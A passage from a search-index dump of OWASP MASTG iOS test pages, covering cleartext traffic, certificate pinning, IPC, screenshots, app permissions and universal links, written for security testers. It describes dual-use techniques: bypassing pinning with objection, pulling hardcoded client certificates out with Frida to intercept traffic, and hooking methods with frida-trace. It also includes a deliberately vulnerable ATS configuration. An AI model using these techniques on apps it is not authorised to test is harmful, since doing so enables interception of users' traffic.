"},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0065/#testing-for-cleartext-traffic","title":"Testing for Cleartext Traffic","text":"Ensure that the app is not allowing cleartext HTTP traffic. Since iOS 9.0 cleartext HTTP traffic is blocked by default (due to App Transport Security (ATS)) but there are multiple ways in which an application can still send it:
NSAllowsArbitraryLoads
attribute to true
(or YES
) on NSAppTransportSecurity
in the app's Info.plist
.Info.plist
Check that NSAllowsArbitraryLoads
is not set to true
globally of for any domain.
If the application opens third party web sites in WebViews, then from iOS 10 onwards NSAllowsArbitraryLoadsInWebContent
can be used to disable ATS restrictions for the content loaded in web views.
Apple warns: Disabling ATS means that unsecured HTTP connections are allowed. HTTPS connections are also allowed, and are still subject to default server trust evaluation. However, extended security checks\u2014like requiring a minimum Transport Layer Security (TLS) protocol version\u2014are disabled. Without ATS, you\u2019re also free to loosen the default server trust requirements, as described in \"Performing Manual Server Trust Authentication\".
The following snippet shows a vulnerable example of an app disabling ATS restrictions globally.
<key>NSAppTransportSecurity</key>\n<dict>\n <key>NSAllowsArbitraryLoads</key>\n <true/>\n</dict>\n
ATS should be examined taking the application's context into consideration. The application may have to define ATS exceptions to fulfill its intended purpose. For example, the Firefox iOS application has ATS disabled globally. This exception is acceptable because otherwise the application would not be able to connect to any HTTP website that does not have all the ATS requirements. In some cases, apps might disable ATS globally but enable it for certain domains to e.g. securely load metadata or still allow secure login.
ATS should include a justification string for this (e.g. \"The app must connect to a server managed by another entity that doesn\u2019t support secure connections.\").
"},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0065/#dynamic-analysis","title":"Dynamic Analysis","text":"Intercept the tested app's incoming and outgoing network traffic and make sure that this traffic is encrypted. You can intercept network traffic in any of the following ways:
Some applications may not work with proxies like Burp and OWASP ZAP because of Certificate Pinning. In such a scenario, please check \"Testing Custom Certificate Stores and Certificate Pinning\".
For more details refer to:
Remember to inspect the corresponding justifications to discard that it might be part of the app intended purpose.
It is possible to verify which ATS settings can be used when communicating to a certain endpoint. On macOS the command line utility nscurl
can be used. A permutation of different settings will be executed and verified against the specified endpoint. If the default ATS secure connection test is passing, ATS can be used in its default secure configuration. If there are any fails in the nscurl output, please change the server side configuration of TLS to make the server side more secure, rather than weakening the configuration in ATS on the client. See the article \"Identifying the Source of Blocked Connections\" in the Apple Developer Documentation for more details.
Refer to section \"Verifying the TLS Settings\" in chapter Testing Network Communication for details.
"},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0067/","title":"Testing Endpoint Identity Verification","text":""},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0067/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0067/#static-analysis","title":"Static Analysis","text":"Using TLS to transport sensitive information over the network is essential for security. However, encrypting communication between a mobile application and its backend API is not trivial. Developers often decide on simpler but less secure solutions (e.g., those that accept any certificate) to facilitate the development process, and sometimes these weak solutions make it into the production version, potentially exposing users to man-in-the-middle attacks.
These are some of the issues should be addressed:
Make sure that the hostname and the certificate itself are verified correctly. Examples and common pitfalls are available in the official Apple documentation.
We highly recommend supporting static analysis with the dynamic analysis. If you don't have the source code or the app is difficult to reverse engineer, having a solid dynamic analysis strategy can definitely help. In that case you won't know if the app uses low or high-level APIs but you can still test for different trust evaluation scenarios (e.g. \"does the app accept a self-signed certificate?\").
"},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0067/#dynamic-analysis","title":"Dynamic Analysis","text":"Our test approach is to gradually relax security of the SSL handshake negotiation and check which security mechanisms are enabled.
If executing the instructions from the previous step doesn't lead to traffic being proxied, it may mean that certificate pinning is actually implemented and all security measures are in place. However, you still need to bypass the pinning in order to test the application. Please refer to the section \"Bypassing Certificate Pinning\" for more information on this.
"},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0068/","title":"Testing Custom Certificate Stores and Certificate Pinning","text":""},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0068/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0068/#static-analysis","title":"Static Analysis","text":"Verify that the server certificate is pinned. Pinning can be implemented on various levels in terms of the certificate tree presented by the server:
The latest approach recommended by Apple is to specify a pinned CA public key in the Info.plist
file under App Transport Security Settings. You can find an example in their article Identity Pinning: How to configure server certificates for your app.
Another common approach is to use the connection:willSendRequestForAuthenticationChallenge:
method of NSURLConnectionDelegate
to check if the certificate provided by the server is valid and matches the certificate stored in the app. You can find more details in the HTTPS Server Trust Evaluation technical note.
The following third-party libraries include pinning functionality:
ServerTrustPolicy
per domain for which you can define a PinnedCertificatesTrustEvaluator
. See its documentation for more details.AFSecurityPolicy
to configure your pinning.Follow the instructions from the Dynamic Analysis section of \"Testing Endpoint Identity Verification. If doing so doesn't lead to traffic being proxied, it may mean that certificate pinning is actually implemented and all security measures are in place. Does the same happen for all domains?
As a quick smoke test, you can try to bypass certificate pinning using objection as described in \"Bypassing Certificate Pinning\". Pinning related APIs being hooked by objection should appear in objection's output.
However, keep in mind that:
In both cases, the app or some of its components might implement custom pinning in a way that is supported by objection. Please check the static analysis section for specific pinning indicators and more in-depth testing.
"},{"location":"MASTG/tests/ios/MASVS-NETWORK/MASTG-TEST-0068/#client-certificate-validation","title":"Client certificate validation","text":"Some applications use mTLS (mutual TLS), meaning that the application verifies the server's certificate and the server verifies the client's certificate. You can notice this if there is an error in Burp Alerts tab indicating that client failed to negotiate connection.
There are a couple of things worth noting:
The most common and improper way of using mTLS is to store the client certificate within the application bundle and hardcode the password. This obviously does not bring much security, because all clients will share the same certificate.
Second way of storing the certificate (and possibly password) is to use the Keychain. Upon first login, the application should download the personal certificate and store it securely in the Keychain.
Sometimes applications have one certificate that is hardcoded and use it for the first login and then the personal certificate is downloaded. In this case, check if it's possible to still use the 'generic' certificate to connect to the server.
Once you have extracted the certificate from the application (e.g. using Frida), add it as client certificate in Burp, and you will be able to intercept the traffic.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0056/","title":"Determining Whether Sensitive Data Is Exposed via IPC Mechanisms","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0056/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0056/#static-analysis","title":"Static Analysis","text":"The following section summarizes keywords that you should look for to identify IPC implementations within iOS source code.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0056/#xpc-services","title":"XPC Services","text":"Several classes may be used to implement the NSXPCConnection API:
You can set security attributes for the connection. The attributes should be verified.
Check for the following two files in the Xcode project for the XPC Services API (which is C-based):
xpc.h
connection.h
Keywords to look for in low-level implementations:
Keywords to look for in high-level implementations (Core Foundation and Foundation wrappers):
Keywords to look for:
Verify IPC mechanisms with static analysis of the iOS source code. No iOS tool is currently available to verify IPC usage.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0057/","title":"Checking for Sensitive Data Disclosed Through the User Interface","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0057/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0057/#static-analysis","title":"Static Analysis","text":"A text field that masks its input can be configured in two ways:
Storyboard In the iOS project's storyboard, navigate to the configuration options for the text field that takes sensitive data. Make sure that the option \"Secure Text Entry\" is selected. If this option is activated, dots are shown in the text field in place of the text input.
Source Code If the text field is defined in the source code, make sure that the option isSecureTextEntry
is set to \"true\". This option obscures the text input by showing dots.
sensitiveTextField.isSecureTextEntry = true\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0057/#dynamic-analysis","title":"Dynamic Analysis","text":"To determine whether the application leaks any sensitive information to the user interface, run the application and identify components that either show such information or take it as input.
If the information is masked by, for example, asterisks or dots, the app isn't leaking data to the user interface.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0059/","title":"Testing Auto-Generated Screenshots for Sensitive Information","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0059/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0059/#static-analysis","title":"Static Analysis","text":"If you have the source code, search for the applicationDidEnterBackground
method to determine whether the application sanitizes the screen before being backgrounded.
The following is a sample implementation using a default background image (overlayImage.png
) whenever the application is backgrounded, overriding the current view:
Swift:
private var backgroundImage: UIImageView?\n\nfunc applicationDidEnterBackground(_ application: UIApplication) {\n let myBanner = UIImageView(image: #imageLiteral(resourceName: \"overlayImage\"))\n myBanner.frame = UIScreen.main.bounds\n backgroundImage = myBanner\n window?.addSubview(myBanner)\n}\n\nfunc applicationWillEnterForeground(_ application: UIApplication) {\n backgroundImage?.removeFromSuperview()\n}\n
Objective-C:
@property (UIImageView *)backgroundImage;\n\n- (void)applicationDidEnterBackground:(UIApplication *)application {\n UIImageView *myBanner = [[UIImageView alloc] initWithImage:@\"overlayImage.png\"];\n self.backgroundImage = myBanner;\n self.backgroundImage.bounds = UIScreen.mainScreen.bounds;\n [self.window addSubview:myBanner];\n}\n\n- (void)applicationWillEnterForeground:(UIApplication *)application {\n [self.backgroundImage removeFromSuperview];\n}\n
This sets the background image to overlayImage.png
whenever the application is backgrounded. It prevents sensitive data leaks because overlayImage.png
will always override the current view.
You can use a visual approach to quickly validate this test case using any iOS device (jailbroken or not):
If required, you may also collect evidence by performing steps 1 to 3 on a jailbroken device or a non-jailbroken device after repackaging the app with the Frida Gadget. After that, connect to the iOS device per SSH or by other means and navigate to the Snapshots directory. The location may differ on each iOS version but it's usually inside the app's Library directory. For instance, on iOS 14.5 the Snapshots directory is located at:
/var/mobile/Containers/Data/Application/$APP_ID/Library/SplashBoard/Snapshots/sceneID:$APP_NAME-default/\n
The screenshots inside that folder should not contain any sensitive information.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/","title":"Testing App Permissions","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/#static-analysis","title":"Static Analysis","text":"Since iOS 10, these are the main areas which you need to inspect for permissions:
If having the original source code, you can verify the permissions included in the Info.plist
file:
Info.plist
file in the default editor and search for the keys starting with \"Privacy -\"
.You may switch the view to display the raw values by right-clicking and selecting \"Show Raw Keys/Values\" (this way for example \"Privacy - Location When In Use Usage Description\"
will turn into NSLocationWhenInUseUsageDescription
).
If only having the IPA:
Info.plist
is located in Payload/<appname>.app/Info.plist
.plutil -convert xml1 Info.plist
) as explained in the chapter \"iOS Basic Security Testing\", section \"The Info.plist File\".Inspect all purpose strings Info.plist keys, usually ending with UsageDescription
:
<plist version=\"1.0\">\n<dict>\n <key>NSLocationWhenInUseUsageDescription</key>\n <string>Your location is used to provide turn-by-turn directions to your destination.</string>\n
For each purpose string in the Info.plist
file, check if the permission makes sense.
For example, imagine the following lines were extracted from a Info.plist
file used by a Solitaire game:
<key>NSHealthClinicalHealthRecordsShareUsageDescription</key>\n<string>Share your health data with us!</string>\n<key>NSCameraUsageDescription</key>\n<string>We want to access your camera</string>\n
It should be suspicious that a regular solitaire game requests this kind of resource access as it probably does not have any need for accessing the camera nor a user's health-records.
Apart from simply checking if the permissions make sense, further analysis steps might be derived from analyzing purpose strings e.g. if they are related to storage sensitive data. For example, NSPhotoLibraryUsageDescription
can be considered as a storage permission giving access to files that are outside of the app's sandbox and might also be accessible by other apps. In this case, it should be tested that no sensitive data is being stored there (photos in this case). For other purpose strings like NSLocationAlwaysUsageDescription
, it must be also considered if the app is storing this data securely. Refer to the \"Testing Data Storage\" chapter for more information and best practices on securely storing sensitive data.
When you do not have the original source code, you should analyze the IPA and search inside for the embedded provisioning profile that is usually located in the root app bundle folder (Payload/<appname>.app/
) under the name embedded.mobileprovision
.
This file is not a .plist
, it is encoded using Cryptographic Message Syntax. On macOS you can inspect an embedded provisioning profile's entitlements using the following command:
security cms -D -i embedded.mobileprovision\n
and then search for the Entitlements key region (<key>Entitlements</key>
).
If you only have the app's IPA or simply the installed app on a jailbroken device, you normally won't be able to find .entitlements
files. This could be also the case for the embedded.mobileprovision
file. Still, you should be able to extract the entitlements property lists from the app binary yourself (which you've previously obtained as explained in the \"iOS Basic Security Testing\" chapter, section \"Acquiring the App Binary\").
The following steps should work even when targeting an encrypted binary. If for some reason they don't, you'll have to decrypt and extract the app with e.g. Clutch (if compatible with your iOS version), frida-ios-dump or similar.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/#extracting-the-entitlements-plist-from-the-app-binary","title":"Extracting the Entitlements Plist from the App Binary","text":"If you have the app binary on your computer, one approach is to use binwalk to extract (-e
) all XML files (-y=xml
):
$ binwalk -e -y=xml ./Telegram\\ X\n\nDECIMAL HEXADECIMAL DESCRIPTION\n--------------------------------------------------------------------------------\n1430180 0x15D2A4 XML document, version: \"1.0\"\n1458814 0x16427E XML document, version: \"1.0\"\n
Or you can use radare2 (-qc
to quietly run one command and exit) to search all strings on the app binary (izz
) containing \"PropertyList\" (~PropertyList
):
$ r2 -qc 'izz~PropertyList' ./Telegram\\ X\n\n0x0015d2a4 ascii <?xml version=\"1.0\" encoding=\"UTF-8\" standalone=\"yes\"?>\\n<!DOCTYPE plist PUBLIC\n\"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\\n<plist version=\"1.0\">\n...<key>com.apple.security.application-groups</key>\\n\\t\\t<array>\n\\n\\t\\t\\t<string>group.ph.telegra.Telegraph</string>...\n\n0x0016427d ascii H<?xml version=\"1.0\" encoding=\"UTF-8\"?>\\n<!DOCTYPE plist PUBLIC\n\"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\\n<plist version=\"1.0\">\\n\n<dict>\\n\\t<key>cdhashes</key>...\n
In both cases (binwalk or radare2) we were able to extract the same two plist
files. If we inspect the first one (0x0015d2a4) we see that we were able to completely recover the original entitlements file from Telegram.
Note: the strings
command will not help here as it will not be able to find this information. Better use grep with the -a
flag directly on the binary or use radare2 (izz
)/rabin2 (-zz
).
If you access the app binary on the jailbroken device (e.g via SSH), you can use grep with the -a, --text
flag (treats all files as ASCII text):
$ grep -a -A 5 'PropertyList' /var/containers/Bundle/Application/\n 15E6A58F-1CA7-44A4-A9E0-6CA85B65FA35/Telegram X.app/Telegram\\ X\n\n<!DOCTYPE plist PUBLIC \"-//Apple//DTD PLIST 1.0//EN\" \"http://www.apple.com/DTDs/PropertyList-1.0.dtd\">\n<plist version=\"1.0\">\n <dict>\n <key>com.apple.security.application-groups</key>\n <array>\n ...\n
Play with the -A num, --after-context=num
flag to display more or less lines. You may use tools like the ones we presented above as well, if you have them also installed on your jailbroken iOS device.
This method should work even if the app binary is still encrypted (it was tested against several App Store apps).
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/#source-code-inspection","title":"Source Code Inspection","text":"After having checked the <appname>.entitlements
file and the Info.plist
file, it is time to verify how the requested permissions and assigned capabilities are put to use. For this, a source code review should be enough. However, if you don't have the original source code, verifying the use of permissions might be specially challenging as you might need to reverse engineer the app, refer to the \"Dynamic Analysis\" for more details on how to proceed.
When doing a source code review, pay attention to:
Info.plist
file match the programmatic implementations.Users can grant or revoke authorization at any time via \"Settings\", therefore apps normally check the authorization status of a feature before accessing it. This can be done by using dedicated APIs available for many system frameworks that provide access to protected resources.
You can use the Apple Developer Documentation as a starting point. For example:
state
property of the CBCentralManager
class is used to check system-authorization status for using Bluetooth peripherals.Location: search for methods of CLLocationManager
, e.g. locationServicesEnabled
.
func checkForLocationServices() {\n if CLLocationManager.locationServicesEnabled() {\n // Location services are available, so query the user\u2019s location.\n } else {\n // Update your app\u2019s UI to show that the location is unavailable.\n }\n}\n
See Table1 in \"Determining the Availability of Location Services\" (Apple Developer Documentation) for a complete list.
Go through the application searching for usages of these APIs and check what happens to sensitive data that might be obtained from them. For example, it might be stored or transmitted over the network, if this is the case, proper data protection and transport security should be additionally verified.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0069/#dynamic-analysis","title":"Dynamic Analysis","text":"With help of the static analysis you should already have a list of the included permissions and app capabilities in use. However, as mentioned in \"Source Code Inspection\", spotting the sensitive data and APIs related to those permissions and app capabilities might be a challenging task when you don't have the original source code. Dynamic analysis can help here getting inputs to iterate onto the static analysis.
Following an approach like the one presented below should help you spotting the mentioned sensitive data and APIs:
NSLocationWhenInUseUsageDescription
).Core Location
). You may use the Apple Developer Documentation for this.CLLocationManager
), for example, using frida-trace
.Once all methods were identified, you might use this knowledge to reverse engineer the app and try to find out how the data is being handled. While doing that you might spot new methods involved in the process which you can again feed to step 3. above and keep iterating between static and dynamic analysis.
In the following example we use Telegram to open the share dialog from a chat and frida-trace to identify which methods are being called.
First we launch Telegram and start a trace for all methods matching the string \"authorizationStatus\" (this is a general approach because more classes apart from CLLocationManager
implement this method):
frida-trace -U \"Telegram\" -m \"*[* *authorizationStatus*]\"\n
-U
connects to the USB device. -m
includes an Objective-C method to the traces. You can use a glob pattern (e.g. with the \"*\" wildcard, -m \"*[* *authorizationStatus*]\"
means \"include any Objective-C method of any class containing 'authorizationStatus'\"). Type frida-trace -h
for more information.
Now we open the share dialog:
The following methods are displayed:
1942 ms +[PHPhotoLibrary authorizationStatus]\n 1959 ms +[TGMediaAssetsLibrary authorizationStatusSignal]\n 1959 ms | +[TGMediaAssetsModernLibrary authorizationStatusSignal]\n
If we click on Location, another method will be traced:
11186 ms +[CLLocationManager authorizationStatus]\n 11186 ms | +[CLLocationManager _authorizationStatus]\n 11186 ms | | +[CLLocationManager _authorizationStatusForBundleIdentifier:0x0 bundle:0x0]\n
Use the auto-generated stubs of frida-trace to get more information like the return values and a backtrace. Do the following modifications to the JavaScript file below (the path is relative to the current directory):
// __handlers__/__CLLocationManager_authorizationStatus_.js\n\n onEnter: function (log, args, state) {\n log(\"+[CLLocationManager authorizationStatus]\");\n log(\"Called from:\\n\" +\n Thread.backtrace(this.context, Backtracer.ACCURATE)\n .map(DebugSymbol.fromAddress).join(\"\\n\\t\") + \"\\n\");\n },\n onLeave: function (log, retval, state) {\n console.log('RET :' + retval.toString());\n }\n
Clicking again on \"Location\" reveals more information:
3630 ms -[CLLocationManager init]\n 3630 ms | -[CLLocationManager initWithEffectiveBundleIdentifier:0x0 bundle:0x0]\n 3634 ms -[CLLocationManager setDelegate:0x14c9ab000]\n 3641 ms +[CLLocationManager authorizationStatus]\nRET: 0x4\n 3641 ms Called from:\n0x1031aa158 TelegramUI!+[TGLocationUtils requestWhenInUserLocationAuthorizationWithLocationManager:]\n 0x10337e2c0 TelegramUI!-[TGLocationPickerController initWithContext:intent:]\n 0x101ee93ac TelegramUI!0x1013ac\n
We see that +[CLLocationManager authorizationStatus]
returned 0x4
(CLAuthorizationStatus.authorizedWhenInUse) and was called by +[TGLocationUtils requestWhenInUserLocationAuthorizationWithLocationManager:]
. As we anticipated before, you might use this kind of information as an entry point when reverse engineering the app and from there get inputs (e.g. names of classes or methods) to keep feeding the dynamic analysis.
Next, there is a visual way to inspect the status of some app permissions when using the iPhone/iPad by opening \"Settings\" and scrolling down until you find the app you're interested in. When clicking on it, this will open the \"ALLOW APP_NAME TO ACCESS\" screen. However, not all permissions might be displayed yet. You will have to trigger them in order to be listed on that screen.
For example, in the previous example, the \"Location\" entry was not being listed until we triggered the permission dialogue for the first time. Once we did it, no matter if we allowed the access or not, the the \"Location\" entry will be displayed.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/","title":"Testing Universal Links","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#overview","title":"Overview","text":""},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#static-analysis","title":"Static Analysis","text":"Testing universal links on a static approach includes doing the following:
Universal links require the developer to add the Associated Domains entitlement and include in it a list of the domains that the app supports.
In Xcode, go to the Capabilities tab and search for Associated Domains. You can also inspect the .entitlements
file looking for com.apple.developer.associated-domains
. Each of the domains must be prefixed with applinks:
, such as applinks:www.mywebsite.com
.
Here's an example from Telegram's .entitlements
file:
<key>com.apple.developer.associated-domains</key>\n <array>\n <string>applinks:telegram.me</string>\n <string>applinks:t.me</string>\n </array>\n
More detailed information can be found in the archived Apple Developer Documentation.
If you don't have the original source code you can still search for them, as explained in \"Entitlements Embedded in the Compiled App Binary\".
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#retrieving-the-apple-app-site-association-file","title":"Retrieving the Apple App Site Association File","text":"Try to retrieve the apple-app-site-association
file from the server using the associated domains you got from the previous step. This file needs to be accessible via HTTPS, without any redirects, at https://<domain>/apple-app-site-association
or https://<domain>/.well-known/apple-app-site-association
.
You can retrieve it yourself using your browser and navigating to https://<domain>/apple-app-site-association
, https://<domain>/.well-known/apple-app-site-association
or using Apple's CDN at https://app-site-association.cdn-apple.com/a/v1/<domain>
.
Alternatively, you can use the Apple App Site Association (AASA) Validator. After entering the domain, it will display the file, verify it for you and show the results (e.g. if it is not being properly served over HTTPS). See the following example from apple.com https://www.apple.com/.well-known/apple-app-site-association
:
{\n \"activitycontinuation\": {\n \"apps\": [\n \"W74U47NE8E.com.apple.store.Jolly\"\n ]\n },\n \"applinks\": {\n \"apps\": [],\n \"details\": [\n {\n \"appID\": \"W74U47NE8E.com.apple.store.Jolly\",\n \"paths\": [\n \"NOT /shop/buy-iphone/*\",\n \"NOT /us/shop/buy-iphone/*\",\n \"/xc/*\",\n \"/shop/buy-*\",\n \"/shop/product/*\",\n \"/shop/bag/shared_bag/*\",\n \"/shop/order/list\",\n \"/today\",\n \"/shop/watch/watch-accessories\",\n \"/shop/watch/watch-accessories/*\",\n \"/shop/watch/bands\",\n ] } ] }\n}\n
The \"details\" key inside \"applinks\" contains a JSON representation of an array that might contain one or more apps. The \"appID\" should match the \"application-identifier\" key from the app\u2019s entitlements. Next, using the \"paths\" key, the developers can specify certain paths to be handled on a per app basis. Some apps, like Telegram use a standalone * (\"paths\": [\"*\"]
) in order to allow all possible paths. Only if specific areas of the website should not be handled by some app, the developer can restrict access by excluding them by prepending a \"NOT \"
(note the whitespace after the T) to the corresponding path. Also remember that the system will look for matches by following the order of the dictionaries in the array (first match wins).
This path exclusion mechanism is not to be seen as a security feature but rather as a filter that developer might use to specify which apps open which links. By default, iOS does not open any unverified links.
Remember that universal links verification occurs at installation time. iOS retrieves the AASA file for the declared domains (applinks
) in its com.apple.developer.associated-domains
entitlement. iOS will refuse to open those links if the verification did not succeed. Some reasons to fail verification might include:
appID
s do not match (this would be the case of a malicious app). iOS would successfully prevent any possible hijacking attacks.In order to receive links and handle them appropriately, the app delegate has to implement application:continueUserActivity:restorationHandler:
. If you have the original project try searching for this method.
Please note that if the app uses openURL:options:completionHandler:
to open a universal link to the app's website, the link won't open in the app. As the call originates from the app, it won't be handled as a universal link.
From Apple Docs: When iOS launches your app after a user taps a universal link, you receive an NSUserActivity
object with an activityType
value of NSUserActivityTypeBrowsingWeb
. The activity object\u2019s webpageURL
property contains the URL that the user is accessing. The webpage URL property always contains an HTTP or HTTPS URL, and you can use NSURLComponents
APIs to manipulate the components of the URL. [...] To protect users\u2019 privacy and security, you should not use HTTP when you need to transport data; instead, use a secure transport protocol such as HTTPS.
From the note above we can highlight that:
NSUserActivity
object comes from the continueUserActivity
parameter, as seen in the method above.webpageURL
must be HTTP or HTTPS (any other scheme should throw an exception). The scheme
instance property of URLComponents
/ NSURLComponents
can be used to verify this.If you don't have the original source code you can use radare2 or rabin2 to search the binary strings for the link receiver method:
$ rabin2 -zq Telegram\\ X.app/Telegram\\ X | grep restorationHan\n\n0x1000deea9 53 52 application:continueUserActivity:restorationHandler:\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#checking-the-data-handler-method","title":"Checking the Data Handler Method","text":"You should check how the received data is validated. Apple explicitly warns about this:
Universal links offer a potential attack vector into your app, so make sure to validate all URL parameters and discard any malformed URLs. In addition, limit the available actions to those that do not risk the user\u2019s data. For example, do not allow universal links to directly delete content or access sensitive information about the user. When testing your URL-handling code, make sure your test cases include improperly formatted URLs.
As stated in the Apple Developer Documentation, when iOS opens an app as the result of a universal link, the app receives an NSUserActivity
object with an activityType
value of NSUserActivityTypeBrowsingWeb
. The activity object\u2019s webpageURL
property contains the HTTP or HTTPS URL that the user accesses. The following example in Swift verifies exactly this before opening the URL:
func application(_ application: UIApplication, continue userActivity: NSUserActivity,\n restorationHandler: @escaping ([UIUserActivityRestoring]?) -> Void) -> Bool {\n // ...\n if userActivity.activityType == NSUserActivityTypeBrowsingWeb, let url = userActivity.webpageURL {\n application.open(url, options: [:], completionHandler: nil)\n }\n\n return true\n}\n
In addition, remember that if the URL includes parameters, they should not be trusted before being carefully sanitized and validated (even when coming from trusted domain). For example, they might have been spoofed by an attacker or might include malformed data. If that is the case, the whole URL and therefore the universal link request must be discarded.
The NSURLComponents
API can be used to parse and manipulate the components of the URL. This can be also part of the method application:continueUserActivity:restorationHandler:
itself or might occur on a separate method being called from it. The following example demonstrates this:
func application(_ application: UIApplication,\n continue userActivity: NSUserActivity,\n restorationHandler: @escaping ([Any]?) -> Void) -> Bool {\n guard userActivity.activityType == NSUserActivityTypeBrowsingWeb,\n let incomingURL = userActivity.webpageURL,\n let components = NSURLComponents(url: incomingURL, resolvingAgainstBaseURL: true),\n let path = components.path,\n let params = components.queryItems else {\n return false\n }\n\n if let albumName = params.first(where: { $0.name == \"albumname\" })?.value,\n let photoIndex = params.first(where: { $0.name == \"index\" })?.value {\n // Interact with album name and photo index\n\n return true\n\n } else {\n // Handle when album and/or album name or photo index missing\n\n return false\n }\n}\n
Finally, as stated above, be sure to verify that the actions triggered by the URL do not expose sensitive information or risk the user\u2019s data on any way.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#checking-if-the-app-is-calling-other-apps-universal-links","title":"Checking if the App is Calling Other App's Universal Links","text":"An app might be calling other apps via universal links in order to simply trigger some actions or to transfer information, in that case, it should be verified that it is not leaking sensitive information.
If you have the original source code, you can search it for the openURL:options: completionHandler:
method and check the data being handled.
Note that the openURL:options:completionHandler:
method is not only used to open universal links but also to call custom URL schemes.
This is an example from the Telegram app:
}, openUniversalUrl: { url, completion in\n if #available(iOS 10.0, *) {\n var parsedUrl = URL(string: url)\n if let parsed = parsedUrl {\n if parsed.scheme == nil || parsed.scheme!.isEmpty {\n parsedUrl = URL(string: \"https://\\(url)\")\n }\n }\n\n if let parsedUrl = parsedUrl {\n return UIApplication.shared.open(parsedUrl,\n options: [UIApplicationOpenURLOptionUniversalLinksOnly: true as NSNumber],\n completionHandler: { value in completion.completion(value)}\n )\n
Note how the app adapts the scheme
to \"https\" before opening it and how it uses the option UIApplicationOpenURLOptionUniversalLinksOnly: true
that opens the URL only if the URL is a valid universal link and there is an installed app capable of opening that URL.
If you don't have the original source code, search in the symbols and in the strings of the app binary. For example, we will search for Objective-C methods that contain \"openURL\":
$ rabin2 -zq Telegram\\ X.app/Telegram\\ X | grep openURL\n\n0x1000dee3f 50 49 application:openURL:sourceApplication:annotation:\n0x1000dee71 29 28 application:openURL:options:\n0x1000df2c9 9 8 openURL:\n0x1000df772 35 34 openURL:options:completionHandler:\n
As expected, openURL:options:completionHandler:
is among the ones found (remember that it might be also present because the app opens custom URL schemes). Next, to ensure that no sensitive information is being leaked you'll have to perform dynamic analysis and inspect the data being transmitted. Please refer to \"Identifying and Hooking the URL Handler Method\" for some examples on hooking and tracing this method.
If an app is implementing universal links, you should have the following outputs from the static analysis:
You can use this now to dynamically test them:
Unlike custom URL schemes, unfortunately you cannot test universal links from Safari just by typing them in the search bar directly as this is not allowed by Apple. But you can test them anytime using other apps like the Notes app:
To do it from Safari you will have to find an existing link on a website that once clicked, it will be recognized as a Universal Link. This can be a bit time consuming.
Alternatively you can also use Frida for this, see the section \"Performing URL Requests\" for more details.
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#identifying-valid-universal-links","title":"Identifying Valid Universal Links","text":"First of all we will see the difference between opening an allowed Universal Link and one that shouldn't be allowed.
From the apple-app-site-association
of apple.com we have seen above we chose the following paths:
\"paths\": [\n \"NOT /shop/buy-iphone/*\",\n ...\n \"/today\",\n
One of them should offer the \"Open in app\" option and the other should not.
If we long press on the first one (http://www.apple.com/shop/buy-iphone/iphone-xr
) it only offers the option to open it (in the browser).
If we long press on the second (http://www.apple.com/today
) it shows options to open it in Safari and in \"Apple Store\":
Note that there is a difference between a click and a long press. Once we long press a link and select an option, e.g. \"Open in Safari\", this will become the default option for all future clicks until we long press again and select another option.
If we repeat the process on the method application:continueUserActivity: restorationHandler:
by either hooking or tracing, we will see how it gets called as soon as we open the allowed universal link. For this you can use for example frida-trace
:
frida-trace -U \"Apple Store\" -m \"*[* *restorationHandler*]\"\n
"},{"location":"MASTG/tests/ios/MASVS-PLATFORM/MASTG-TEST-0070/#tracing-the-link-receiver-method","title":"Tracing the Link Receiver Method","text":"This section explains how to trace the link receiver method and how to extract additional information. For this example, we will use Telegram, as there are no restrictions in its apple-app-site-association
file:
